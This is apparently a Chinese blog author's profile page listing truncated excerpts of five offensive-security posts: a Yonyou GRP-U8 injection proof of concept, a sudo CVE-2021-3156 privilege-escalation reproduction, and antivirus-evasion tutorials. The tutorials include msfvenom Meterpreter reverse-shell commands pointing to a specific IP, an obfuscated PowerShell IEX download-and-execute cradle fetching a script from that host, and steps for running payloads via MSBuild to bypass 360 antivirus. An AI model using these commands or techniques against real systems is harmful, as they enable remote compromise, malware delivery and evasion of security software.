- 博客(5)
- 收藏
- 关注
原创 用友u8 注入RCE漏洞利用数据
一、漏洞成因用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。二、用于SQL注入的POCPOST /Proxy HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.
2021-07-07 16:24:42
1065
原创 Linux sudo权限提升漏洞复现(CVE-2021-3156)
一、背景sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。二、特性§ sudo能够限制用户只在某台主机上运行某些命令。§ sudo提供了丰富的日志,详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。§ sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且
2021-02-02 14:04:03
550
原创 Foureye实现免杀
一、项目地址https://github.com/lengjibo/FourEye推荐挂代理二、相关命令git clone https://github.com/lengjibo/FourEye.gitcd FourEyepip install -r requirements.txt三、msfvenom生成shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f raw -o
2021-01-29 17:21:44
597
2
原创 Pcalua+Powershell混淆
一、Pcalua加载shellcode1、msfvenom生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps12、混淆处理powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.
2021-01-29 17:03:39
281
原创 MSBuild.exe执⾏payload过360
1、msfvenom生成shellcode,注意⽣成的是psh格式msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2lport=3333 -f psh -o shell.ps12、打开生成 shell.ps1 ⽂件,在⽂件最后添加 for (;;){ Start-sleep 60} 保存一下3、将修改后的 shell.ps1 ⽂件内容进⾏base64编码可以使⽤在线平台(⽐如:https://www.so
2021-01-26 17:47:35
303
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人